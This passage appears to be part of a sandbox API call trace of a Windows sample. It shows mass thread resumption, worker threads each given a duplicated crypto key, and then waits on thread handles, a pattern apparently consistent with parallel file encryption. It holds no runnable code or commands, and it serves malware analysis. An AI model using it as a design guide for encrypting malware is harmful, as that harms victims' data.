(hThread=0xb94) returned 0x1 [0143.770] Sleep (dwMilliseconds=0x0) [0143.772] ResumeThread (hThread=0xba8) returned 0x1 [0143.772] Sleep (dwMilliseconds=0x0) [0143.773] ResumeThread (hThread=0xbbc) returned 0x1 [0143.773] Sleep (dwMilliseconds=0x0) [0143.775] ResumeThread (hThread=0xbd0) returned 0x1 [0143.775] Sleep (dwMilliseconds=0x0) [0143.776] ResumeThread (hThread=0xbe4) returned 0x1 [0143.776] Sleep (dwMilliseconds=0x0) [0143.778] ResumeThread (hThread=0xbf8) returned 0x1 [0143.778] Sleep (dwMilliseconds=0x0) [0143.780] ResumeThread (hThread=0xc10) returned 0x1 [0143.780] Sleep (dwMilliseconds=0x0) [0143.781] ResumeThread (hThread=0xc24) returned 0x1 [0143.781] Sleep (dwMilliseconds=0x0) [0143.785] ResumeThread (hThread=0xc38) returned 0x1 [0143.785] Sleep (dwMilliseconds=0x0) [0143.786] ResumeThread (hThread=0xc4c) returned 0x1 [0143.786] Sleep (dwMilliseconds=0x0) [0143.788] ResumeThread (hThread=0xc60) returned 0x1 [0143.788] Sleep (dwMilliseconds=0x0) [0143.789] ResumeThread (hThread=0xc74) returned 0x1 [0143.789] Sleep (dwMilliseconds=0x0) [0143.791] ResumeThread (hThread=0xc88) returned 0x1 [0143.791] Sleep (dwMilliseconds=0x0) [0143.793] ResumeThread (hThread=0xc9c) returned 0x1 [0143.793] Sleep (dwMilliseconds=0x0) [0143.795] ResumeThread (hThread=0xcb0) returned 0x1 [0143.795] Sleep (dwMilliseconds=0x0) [0143.797] ResumeThread (hThread=0xcc4) returned 0x1 [0143.797] Sleep (dwMilliseconds=0x0) [0143.799] ResumeThread (hThread=0xcd8) returned 0x1 [0143.799] Sleep (dwMilliseconds=0x0) [0143.801] ResumeThread (hThread=0xcec) returned 0x1 [0143.801] Sleep (dwMilliseconds=0x0) [0143.803] ResumeThread (hThread=0xd00) returned 0x1 [0143.803] Sleep (dwMilliseconds=0x0) [0143.805] ResumeThread (hThread=0xd14) returned 0x1 [0143.805] Sleep (dwMilliseconds=0x0) [0143.807] ResumeThread (hThread=0xd28) returned 0x1 [0143.807] Sleep (dwMilliseconds=0x0) [0143.809] ResumeThread (hThread=0xd3c) returned 0x1 [0143.809] Sleep (dwMilliseconds=0x0) [0143.811] ResumeThread (hThread=0xd50) returned 0x1 [0143.811] Sleep (dwMilliseconds=0x0) [0143.813] ResumeThread (hThread=0xd64) returned 0x1 [0143.813] Sleep (dwMilliseconds=0x0) [0143.815] ResumeThread (hThread=0xd78) returned 0x1 [0143.815] Sleep (dwMilliseconds=0x0) [0143.816] ResumeThread (hThread=0xd8c) returned 0x1 [0143.816] Sleep (dwMilliseconds=0x0) [0143.818] ResumeThread (hThread=0xda0) returned 0x1 [0143.818] Sleep (dwMilliseconds=0x0) [0143.819] ResumeThread (hThread=0xdb4) returned 0x1 [0143.819] Sleep (dwMilliseconds=0x0) [0143.821] ResumeThread (hThread=0xdc8) returned 0x1 [0143.821] Sleep (dwMilliseconds=0x0) [0143.822] ResumeThread (hThread=0xddc) returned 0x1 [0143.822] Sleep (dwMilliseconds=0x0) [0143.824] ResumeThread (hThread=0xdf0) returned 0x1 [0143.824] Sleep (dwMilliseconds=0x0) [0143.825] ResumeThread (hThread=0xe04) returned 0x1 [0143.825] Sleep (dwMilliseconds=0x0) [0143.827] ResumeThread (hThread=0xe18) returned 0x1 [0143.827] Sleep (dwMilliseconds=0x0) [0143.828] ResumeThread (hThread=0xe2c) returned 0x1 [0143.828] Sleep (dwMilliseconds=0x0) [0143.830] ResumeThread (hThread=0xe40) returned 0x1 [0143.830] Sleep (dwMilliseconds=0x0) [0143.831] ResumeThread (hThread=0xe54) returned 0x1 [0143.831] Sleep (dwMilliseconds=0x0) [0143.833] ResumeThread (hThread=0xe68) returned 0x1 [0143.833] Sleep (dwMilliseconds=0x0) [0143.834] ResumeThread (hThread=0xe7c) returned 0x1 [0143.834] Sleep (dwMilliseconds=0x0) [0143.836] ResumeThread (hThread=0xe90) returned 0x1 [0143.836] Sleep (dwMilliseconds=0x0) [0143.840] ResumeThread (hThread=0xea4) returned 0x1 [0143.840] Sleep (dwMilliseconds=0x0) [0143.841] ResumeThread (hThread=0xeb8) returned 0x1 [0143.841] Sleep (dwMilliseconds=0x0) [0143.843] ResumeThread (hThread=0xecc) returned 0x1 [0143.843] Sleep (dwMilliseconds=0x0) [0143.844] ResumeThread (hThread=0xee0) returned 0x1 [0143.844] Sleep (dwMilliseconds=0x0) [0143.847] ResumeThread (hThread=0xef4) returned 0x1 [0143.847] Sleep (dwMilliseconds=0x0) [0143.848] ResumeThread (hThread=0xf08) returned 0x1 [0143.848] Sleep (dwMilliseconds=0x0) [0143.850] ResumeThread (hThread=0xf1c) returned 0x1 [0143.850] Sleep (dwMilliseconds=0x0) [0143.851] ResumeThread (hThread=0xf30) returned 0x1 [0143.851] Sleep (dwMilliseconds=0x0) [0143.853] ResumeThread (hThread=0xf44) returned 0x1 [0143.853] Sleep (dwMilliseconds=0x0) [0143.854] ResumeThread (hThread=0xf58) returned 0x1 [0143.854] Sleep (dwMilliseconds=0x0) [0143.856] ResumeThread (hThread=0xf6c) returned 0x1 [0143.856] Sleep (dwMilliseconds=0x0) [0143.857] ResumeThread (hThread=0xf80) returned 0x1 [0143.857] Sleep (dwMilliseconds=0x0) [0143.859] ResumeThread (hThread=0xf94) returned 0x1 [0143.859] Sleep (dwMilliseconds=0x0) [0143.860] ResumeThread (hThread=0xfa8) returned 0x1 [0143.860] Sleep (dwMilliseconds=0x0) [0143.862] ResumeThread (hThread=0xfbc) returned 0x1 [0143.862] Sleep (dwMilliseconds=0x0) [0143.865] ResumeThread (hThread=0xfd0) returned 0x1 [0143.865] Sleep (dwMilliseconds=0x0) [0143.866] ResumeThread (hThread=0xfe4) returned 0x1 [0143.866] Sleep (dwMilliseconds=0x0) [0143.868] ResumeThread (hThread=0xff8) returned 0x1 [0143.868] Sleep (dwMilliseconds=0x0) [0143.870] ResumeThread (hThread=0x1010) returned 0x1 [0143.870] Sleep (dwMilliseconds=0x0) [0143.871] ResumeThread (hThread=0x1024) returned 0x1 [0143.871] Sleep (dwMilliseconds=0x0) [0143.872] ResumeThread (hThread=0x1038) returned 0x1 [0143.873] Sleep (dwMilliseconds=0x0) [0143.874] ResumeThread (hThread=0x104c) returned 0x1 [0143.874] Sleep (dwMilliseconds=0x0) [0143.875] ResumeThread (hThread=0x1060) returned 0x1 [0143.875] Sleep (dwMilliseconds=0x0) [0143.877] ResumeThread (hThread=0x1074) returned 0x1 [0143.877] Sleep (dwMilliseconds=0x0) [0143.879] ResumeThread (hThread=0x1088) returned 0x1 [0143.879] Sleep (dwMilliseconds=0x0) [0143.880] ResumeThread (hThread=0x109c) returned 0x1 [0143.880] Sleep (dwMilliseconds=0x0) [0143.882] ResumeThread (hThread=0x10b0) returned 0x1 [0143.882] Sleep (dwMilliseconds=0x0) [0143.885] ResumeThread (hThread=0x10c4) returned 0x1 [0143.885] Sleep (dwMilliseconds=0x0) [0143.887] ResumeThread (hThread=0x10d8) returned 0x1 [0143.887] Sleep (dwMilliseconds=0x0) [0143.888] ResumeThread (hThread=0x10ec) returned 0x1 [0143.888] Sleep (dwMilliseconds=0x0) [0143.890] ResumeThread (hThread=0x1100) returned 0x1 [0143.890] Sleep (dwMilliseconds=0x0) [0143.894] ResumeThread (hThread=0x1114) returned 0x1 [0143.894] Sleep (dwMilliseconds=0x0) [0143.896] ResumeThread (hThread=0x1128) returned 0x1 [0143.896] Sleep (dwMilliseconds=0x0) [0143.897] ResumeThread (hThread=0x113c) returned 0x1 [0143.897] Sleep (dwMilliseconds=0x0) [0143.899] ResumeThread (hThread=0x1150) returned 0x1 [0143.899] Sleep (dwMilliseconds=0x0) [0143.900] ResumeThread (hThread=0x1164) returned 0x1 [0143.900] Sleep (dwMilliseconds=0x0) [0143.903] ResumeThread (hThread=0x1178) returned 0x1 [0143.903] Sleep (dwMilliseconds=0x0) [0143.904] ResumeThread (hThread=0x118c) returned 0x1 [0143.904] Sleep (dwMilliseconds=0x0) [0143.906] ResumeThread (hThread=0x11a0) returned 0x1 [0143.906] Sleep (dwMilliseconds=0x0) [0143.907] ResumeThread (hThread=0x11b4) returned 0x1 [0143.907] Sleep (dwMilliseconds=0x0) [0143.909] ResumeThread (hThread=0x11c8) returned 0x1 [0143.909] Sleep (dwMilliseconds=0x0) [0143.911] ResumeThread (hThread=0x11dc) returned 0x1 [0143.911] Sleep (dwMilliseconds=0x0) [0143.912] ResumeThread (hThread=0x11f0) returned 0x1 [0143.912] Sleep (dwMilliseconds=0x0) [0143.914] ResumeThread (hThread=0x1204) returned 0x1 [0143.914] Sleep (dwMilliseconds=0x0) [0143.915] ResumeThread (hThread=0x1218) returned 0x1 [0143.915] Sleep (dwMilliseconds=0x0) [0143.917] ResumeThread (hThread=0x122c) returned 0x1 [0143.917] Sleep (dwMilliseconds=0x0) [0143.918] ResumeThread (hThread=0x1240) returned 0x1 [0143.919] Sleep (dwMilliseconds=0x0) [0143.920] ResumeThread (hThread=0x1254) returned 0x1 [0143.920] Sleep (dwMilliseconds=0x0) [0143.922] ResumeThread (hThread=0x1268) returned 0x1 [0143.922] Sleep (dwMilliseconds=0x0) [0143.923] ResumeThread (hThread=0x127c) returned 0x1 [0143.923] Sleep (dwMilliseconds=0x0) [0143.925] ResumeThread (hThread=0x1290) returned 0x1 [0143.925] Sleep (dwMilliseconds=0x0) [0143.927] ResumeThread (hThread=0x12a4) returned 0x1 [0143.927] Sleep (dwMilliseconds=0x0) [0143.928] ResumeThread (hThread=0x12b8) returned 0x1 [0143.928] Sleep (dwMilliseconds=0x0) [0143.930] ResumeThread (hThread=0x12cc) returned 0x1 [0143.930] Sleep (dwMilliseconds=0x0) [0143.931] ResumeThread (hThread=0x12e0) returned 0x1 [0143.931] Sleep (dwMilliseconds=0x0) [0143.933] ResumeThread (hThread=0x12f4) returned 0x1 [0143.933] Sleep (dwMilliseconds=0x0) [0143.934] ResumeThread (hThread=0x1308) returned 0x1 [0143.934] Sleep (dwMilliseconds=0x0) [0143.936] ResumeThread (hThread=0x131c) returned 0x1 [0143.936] Sleep (dwMilliseconds=0x0) [0143.937] ResumeThread (hThread=0x1330) returned 0x1 [0143.937] Sleep (dwMilliseconds=0x0) [0143.939] ResumeThread (hThread=0x1344) returned 0x1 [0143.939] Sleep (dwMilliseconds=0x0) [0143.941] ResumeThread (hThread=0x1358) returned 0x1 [0143.941] Sleep (dwMilliseconds=0x0) [0143.945] ResumeThread (hThread=0x136c) returned 0x1 [0143.945] Sleep (dwMilliseconds=0x0) [0143.949] ResumeThread (hThread=0x1380) returned 0x1 [0143.950] Sleep (dwMilliseconds=0x0) [0143.951] ResumeThread (hThread=0x1394) returned 0x1 [0143.951] Sleep (dwMilliseconds=0x0) [0143.953] ResumeThread (hThread=0x13a8) returned 0x1 [0143.953] Sleep (dwMilliseconds=0x0) [0143.954] ResumeThread (hThread=0x13bc) returned 0x1 [0143.954] Sleep (dwMilliseconds=0x0) [0143.957] ResumeThread (hThread=0x13d0) returned 0x1 [0143.957] Sleep (dwMilliseconds=0x0) [0143.958] ResumeThread (hThread=0x13e4) returned 0x1 [0143.958] Sleep (dwMilliseconds=0x0) [0143.961] ResumeThread (hThread=0x13f8) returned 0x1 [0143.961] Sleep (dwMilliseconds=0x0) [0143.962] ResumeThread (hThread=0x1410) returned 0x1 [0143.962] Sleep (dwMilliseconds=0x0) [0143.964] ResumeThread (hThread=0x1424) returned 0x1 [0143.964] Sleep (dwMilliseconds=0x0) [0143.965] ResumeThread (hThread=0x1438) returned 0x1 [0143.965] Sleep (dwMilliseconds=0x0) [0143.967] ResumeThread (hThread=0x144c) returned 0x1 [0143.967] Sleep (dwMilliseconds=0x0) [0143.969] ResumeThread (hThread=0x1460) returned 0x1 [0143.969] Sleep (dwMilliseconds=0x0) [0143.970] ResumeThread (hThread=0x1474) returned 0x1 [0143.970] Sleep (dwMilliseconds=0x0) [0143.972] ResumeThread (hThread=0x1488) returned 0x1 [0143.972] Sleep (dwMilliseconds=0x0) [0143.973] ResumeThread (hThread=0x149c) returned 0x1 [0143.974] Sleep (dwMilliseconds=0x0) [0143.975] ResumeThread (hThread=0x14b0) returned 0x1 [0143.975] Sleep (dwMilliseconds=0x0) [0143.977] ResumeThread (hThread=0x14c4) returned 0x1 [0143.977] Sleep (dwMilliseconds=0x0) [0143.978] ResumeThread (hThread=0x14d8) returned 0x1 [0143.978] Sleep (dwMilliseconds=0x0) [0143.980] ResumeThread (hThread=0x14ec) returned 0x1 [0143.980] Sleep (dwMilliseconds=0x0) [0143.981] ResumeThread (hThread=0x1500) returned 0x1 [0143.981] Sleep (dwMilliseconds=0x0) [0143.983] ResumeThread (hThread=0x1514) returned 0x1 [0143.983] Sleep (dwMilliseconds=0x0) [0143.985] ResumeThread (hThread=0x1528) returned 0x1 [0143.985] Sleep (dwMilliseconds=0x0) [0143.987] ResumeThread (hThread=0x153c) returned 0x1 [0143.987] Sleep (dwMilliseconds=0x0) [0143.989] ResumeThread (hThread=0x1550) returned 0x1 [0143.989] Sleep (dwMilliseconds=0x0) [0143.991] ResumeThread (hThread=0x1564) returned 0x1 [0143.991] Sleep (dwMilliseconds=0x0) [0143.992] ResumeThread (hThread=0x1578) returned 0x1 [0143.992] Sleep (dwMilliseconds=0x0) [0143.995] ResumeThread (hThread=0x158c) returned 0x1 [0143.995] Sleep (dwMilliseconds=0x0) [0144.011] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x1d4211ac | out: phKey=0x1d4211ac*=0x8bdb78) returned 1 [0144.011] GetCurrentThreadId () returned 0x2ec [0144.011] calloc (_Count=0x1, _Size=0xb8) returned 0x1d442de8 [0144.011] GetCurrentThreadId () returned 0x2ec [0144.011] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x1598 [0144.011] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x1d442de8, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x159c [0144.011] SetThreadPriority (hThread=0x159c, nPriority=0) returned 1 [0144.011] ResetEvent (hEvent=0x1598) returned 1 [0144.011] ResumeThread (hThread=0x159c) returned 0x1 [0144.011] Sleep (dwMilliseconds=0x0) [0144.013] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x1d42123c | out: phKey=0x1d42123c*=0x8bdd38) returned 1 [0144.013] GetCurrentThreadId () returned 0x2ec [0144.013] calloc (_Count=0x1, _Size=0xb8) returned 0x1d442ea8 [0144.013] GetCurrentThreadId () returned 0x2ec [0144.013] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x15ac [0144.013] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x1d442ea8, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x15b0 [0144.013] SetThreadPriority (hThread=0x15b0, nPriority=0) returned 1 [0144.013] ResetEvent (hEvent=0x15ac) returned 1 [0144.013] ResumeThread (hThread=0x15b0) returned 0x1 [0144.013] Sleep (dwMilliseconds=0x0) [0144.015] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x1d4211dc | out: phKey=0x1d4211dc*=0x8bdbf8) returned 1 [0144.015] GetCurrentThreadId () returned 0x2ec [0144.015] calloc (_Count=0x1, _Size=0xb8) returned 0x1d442728 [0144.015] GetCurrentThreadId () returned 0x2ec [0144.015] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x15c0 [0144.015] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x1d442728, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x15c4 [0144.015] SetThreadPriority (hThread=0x15c4, nPriority=0) returned 1 [0144.015] ResetEvent (hEvent=0x15c0) returned 1 [0144.015] ResumeThread (hThread=0x15c4) returned 0x1 [0144.015] Sleep (dwMilliseconds=0x0) [0144.016] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x1d4211fc | out: phKey=0x1d4211fc*=0x8bdc78) returned 1 [0144.016] GetCurrentThreadId () returned 0x2ec [0144.016] calloc (_Count=0x1, _Size=0xb8) returned 0x1d4431a8 [0144.016] GetCurrentThreadId () returned 0x2ec [0144.016] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x15d4 [0144.017] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x1d4431a8, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x15d8 [0144.017] SetThreadPriority (hThread=0x15d8, nPriority=0) returned 1 [0144.017] ResetEvent (hEvent=0x15d4) returned 1 [0144.017] ResumeThread (hThread=0x15d8) returned 0x1 [0144.017] Sleep (dwMilliseconds=0x0) [0144.021] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x1d42122c | out: phKey=0x1d42122c*=0x9ad6f8) returned 1 [0144.021] GetCurrentThreadId () returned 0x2ec [0144.021] calloc (_Count=0x1, _Size=0xb8) returned 0x1d443268 [0144.021] GetCurrentThreadId () returned 0x2ec [0144.021] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x15e8 [0144.021] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x1d443268, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x15ec [0144.022] SetThreadPriority (hThread=0x15ec, nPriority=0) returned 1 [0144.022] ResetEvent (hEvent=0x15e8) returned 1 [0144.022] ResumeThread (hThread=0x15ec) returned 0x1 [0144.022] Sleep (dwMilliseconds=0x0) [0144.023] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x1d42124c | out: phKey=0x1d42124c*=0x9ad0f8) returned 1 [0144.023] GetCurrentThreadId () returned 0x2ec [0144.023] calloc (_Count=0x1, _Size=0xb8) returned 0x1d443328 [0144.023] GetCurrentThreadId () returned 0x2ec [0144.023] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x15fc [0144.023] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x1d443328, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x1600 [0144.024] SetThreadPriority (hThread=0x1600, nPriority=0) returned 1 [0144.024] ResetEvent (hEvent=0x15fc) returned 1 [0144.024] ResumeThread (hThread=0x1600) returned 0x1 [0144.024] Sleep (dwMilliseconds=0x0) [0144.025] CryptDuplicateKey (in: hKey=0x8c6be8, pdwReserved=0x0, dwFlags=0x0, phKey=0x1d42126c | out: phKey=0x1d42126c*=0x9ad3f8) returned 1 [0144.025] GetCurrentThreadId () returned 0x2ec [0144.025] calloc (_Count=0x1, _Size=0xb8) returned 0x1d443628 [0144.025] GetCurrentThreadId () returned 0x2ec [0144.025] CreateEventA (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x1610 [0144.025] _beginthreadex (in: _Security=0x0, _StackSize=0x0, _StartAddress=0x431600, _ArgList=0x1d443628, _InitFlag=0x4, _ThrdAddr=0x0 | out: _ThrdAddr=0x0) returned 0x1614 [0144.025] SetThreadPriority (hThread=0x1614, nPriority=0) returned 1 [0144.025] ResetEvent (hEvent=0x1610) returned 1 [0144.025] ResumeThread (hThread=0x1614) returned 0x1 [0144.026] Sleep (dwMilliseconds=0x0) [0144.059] GetCurrentThreadId () returned 0x2ec [0144.059] GetCurrentThreadId () returned 0x2ec [0144.059] GetHandleInformation (in: hObject=0x248, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0144.059] WaitForSingleObject (hHandle=0x248, dwMilliseconds=0xffffffff) returned 0x0 [0164.541] CloseHandle (hObject=0x248) returned 1 [0164.541] GetCurrentThreadId () returned 0x2ec [0164.541] GetCurrentThreadId () returned 0x2ec [0164.541] GetCurrentThreadId () returned 0x2ec [0164.541] GetCurrentThreadId () returned 0x2ec [0164.541] GetHandleInformation (in: hObject=0x260, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0164.541] WaitForSingleObject (hHandle=0x260, dwMilliseconds=0xffffffff) returned 0x0 [0164.541] CloseHandle (hObject=0x260) returned 1 [0164.541] GetCurrentThreadId () returned 0x2ec [0164.541] GetCurrentThreadId () returned 0x2ec [0164.541] GetCurrentThreadId () returned 0x2ec [0164.541] GetCurrentThreadId () returned 0x2ec [0164.541] GetHandleInformation (in: hObject=0x268, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0164.541] WaitForSingleObject (hHandle=0x268, dwMilliseconds=0xffffffff) returned 0x0 [0164.541] CloseHandle (hObject=0x268) returned 1 [0164.541] GetCurrentThreadId () returned 0x2ec [0164.541] GetCurrentThreadId () returned 0x2ec [0164.541] GetCurrentThreadId () returned 0x2ec [0164.541] GetCurrentThreadId () returned 0x2ec [0164.541] GetHandleInformation (in: hObject=0x26c, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0164.541] WaitForSingleObject (hHandle=0x26c, dwMilliseconds=0xffffffff) returned 0x0 [0164.541] CloseHandle (hObject=0x26c) returned 1 [0164.541] GetCurrentThreadId () returned 0x2ec [0164.541] GetCurrentThreadId () returned 0x2ec [0164.541] GetCurrentThreadId () returned 0x2ec [0164.541] GetCurrentThreadId () returned 0x2ec [0164.541] GetHandleInformation (in: hObject=0x274, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0164.541] WaitForSingleObject (hHandle=0x274, dwMilliseconds=0xffffffff) returned 0x0 [0164.541] CloseHandle (hObject=0x274) returned 1 [0164.541] GetCurrentThreadId () returned 0x2ec [0164.541] GetCurrentThreadId () returned 0x2ec [0164.541] GetCurrentThreadId () returned 0x2ec [0164.541] GetCurrentThreadId () returned 0x2ec [0164.541] GetHandleInformation (in: hObject=0x27c, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0164.541] WaitForSingleObject (hHandle=0x27c, dwMilliseconds=0xffffffff) returned 0x0 [0164.541] CloseHandle (hObject=0x27c) returned 1 [0164.541] GetCurrentThreadId () returned 0x2ec [0164.541] GetCurrentThreadId () returned 0x2ec [0164.541] GetCurrentThreadId () returned 0x2ec [0164.541] GetCurrentThreadId () returned 0x2ec [0164.541] GetHandleInformation (in: hObject=0x258, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0164.541] WaitForSingleObject (hHandle=0x258, dwMilliseconds=0xffffffff) returned 0x0 [0164.541] CloseHandle (hObject=0x258) returned 1 [0164.542] GetCurrentThreadId () returned 0x2ec [0164.542] GetCurrentThreadId () returned 0x2ec [0164.542] GetCurrentThreadId () returned 0x2ec [0164.542] GetCurrentThreadId () returned 0x2ec [0164.542] GetHandleInformation (in: hObject=0x290, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0164.542] WaitForSingleObject (hHandle=0x290, dwMilliseconds=0xffffffff) returned 0x0 [0164.542] CloseHandle (hObject=0x290) returned 1 [0164.542] GetCurrentThreadId () returned 0x2ec [0164.542] GetCurrentThreadId () returned 0x2ec [0164.542] GetCurrentThreadId () returned 0x2ec [0164.542] GetCurrentThreadId () returned 0x2ec [0164.542] GetHandleInformation (in: hObject=0x298, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0164.542] WaitForSingleObject (hHandle=0x298, dwMilliseconds=0xffffffff) returned 0x0 [0164.542] CloseHandle (hObject=0x298) returned 1 [0164.542] GetCurrentThreadId () returned 0x2ec [0164.542] GetCurrentThreadId () returned 0x2ec [0164.542] GetCurrentThreadId () returned 0x2ec [0164.542] GetCurrentThreadId () returned 0x2ec [0164.542] GetHandleInformation (in: hObject=0x308, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0164.542] WaitForSingleObject (hHandle=0x308, dwMilliseconds=0xffffffff) returned 0x0 [0164.542] CloseHandle (hObject=0x308) returned 1 [0164.542] GetCurrentThreadId () returned 0x2ec [0164.542] GetCurrentThreadId () returned 0x2ec [0164.542] GetCurrentThreadId () returned 0x2ec [0164.542] GetCurrentThreadId () returned 0x2ec [0164.542] GetHandleInformation (in: hObject=0x31c, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0164.542] WaitForSingleObject (hHandle=0x31c, dwMilliseconds=0xffffffff) returned 0x0 [0164.542] CloseHandle (hObject=0x31c) returned 1 [0164.542] GetCurrentThreadId () returned 0x2ec [0164.542] GetCurrentThreadId () returned 0x2ec [0164.542] GetCurrentThreadId () returned 0x2ec [0164.542] GetCurrentThreadId () returned 0x2ec [0164.542] GetHandleInformation (in: hObject=0x330, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0164.542] WaitForSingleObject (hHandle=0x330, dwMilliseconds=0xffffffff) returned 0x0 [0164.542] CloseHandle (hObject=0x330) returned 1 [0164.542] GetCurrentThreadId () returned 0x2ec [0164.542] GetCurrentThreadId () returned 0x2ec [0164.542] GetCurrentThreadId () returned 0x2ec [0164.542] GetCurrentThreadId () returned 0x2ec [0164.542] GetHandleInformation (in: hObject=0x344, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0164.542] WaitForSingleObject (hHandle=0x344, dwMilliseconds=0xffffffff) returned 0x0 [0164.542] CloseHandle (hObject=0x344) returned 1 [0164.542] GetCurrentThreadId () returned 0x2ec [0164.542] GetCurrentThreadId () returned 0x2ec [0164.542] GetCurrentThreadId () returned 0x2ec [0164.542] GetCurrentThreadId () returned 0x2ec [0164.543] GetHandleInformation (in: hObject=0x358, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0164.543] WaitForSingleObject (hHandle=0x358, dwMilliseconds=0xffffffff) returned 0x0 [0164.543] CloseHandle (hObject=0x358) returned 1 [0164.543] GetCurrentThreadId () returned 0x2ec [0164.543] GetCurrentThreadId () returned 0x2ec [0164.543] GetCurrentThreadId () returned 0x2ec [0164.543] GetCurrentThreadId () returned 0x2ec [0164.543] GetHandleInformation (in: hObject=0x36c, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0164.543] WaitForSingleObject (hHandle=0x36c, dwMilliseconds=0xffffffff) returned 0x0 [0164.543] CloseHandle (hObject=0x36c) returned 1 [0164.543] GetCurrentThreadId () returned 0x2ec [0164.543] GetCurrentThreadId () returned 0x2ec [0164.543] GetCurrentThreadId () returned 0x2ec [0164.543] GetCurrentThreadId () returned 0x2ec [0164.543] GetHandleInformation (in: hObject=0x380, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0164.543] WaitForSingleObject (hHandle=0x380, dwMilliseconds=0xffffffff) returned 0x0 [0164.543] CloseHandle (hObject=0x380) returned 1 [0164.543] GetCurrentThreadId () returned 0x2ec [0164.543] GetCurrentThreadId () returned 0x2ec [0164.543] GetCurrentThreadId () returned 0x2ec [0164.543] GetCurrentThreadId () returned 0x2ec [0164.543] GetHandleInformation (in: hObject=0x394, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0164.543] WaitForSingleObject (hHandle=0x394, dwMilliseconds=0xffffffff) returned 0x0 [0164.543] CloseHandle (hObject=0x394) returned 1 [0164.543] GetCurrentThreadId () returned 0x2ec [0164.543] GetCurrentThreadId () returned 0x2ec [0164.543] GetCurrentThreadId () returned 0x2ec [0164.543] GetCurrentThreadId () returned 0x2ec [0164.543] GetHandleInformation (in: hObject=0x3a8, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0164.543] WaitForSingleObject (hHandle=0x3a8, dwMilliseconds=0xffffffff) returned 0x0 [0164.543] CloseHandle (hObject=0x3a8) returned 1 [0164.543] GetCurrentThreadId () returned 0x2ec [0164.543] GetCurrentThreadId () returned 0x2ec [0164.543] GetCurrentThreadId () returned 0x2ec [0164.543] GetCurrentThreadId () returned 0x2ec [0164.543] GetHandleInformation (in: hObject=0x3bc, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0164.543] WaitForSingleObject (hHandle=0x3bc, dwMilliseconds=0xffffffff) returned 0x0 [0164.543] CloseHandle (hObject=0x3bc) returned 1 [0164.543] GetCurrentThreadId () returned 0x2ec [0164.543] GetCurrentThreadId () returned 0x2ec [0164.543] GetCurrentThreadId () returned 0x2ec [0164.543] GetCurrentThreadId () returned 0x2ec [0164.543] GetHandleInformation (in: hObject=0x3d0, lpdwFlags=0x2b7f900 | out: lpdwFlags=0x2b7f900) returned 1 [0164.543] WaitForSingleObject (hHandle=0x3d0, dwMilliseconds=0xffffffff) returned 0x0 [0164.543] CloseHandle (hObject=0x3d0) returned 1 [0164.544] GetCurrentThreadId () returned 0x2ec [0164.544] GetCurrentThreadId () returned 0x2ec [0164.544] GetCurrentThreadId () returned 0x2ec [0164.544] GetCurrentThreadId () returned 0x2ec [0164.544] GetHandleInformation (in: hObject=0x3e4, lpdwFlags=0x2b7f900 | out: 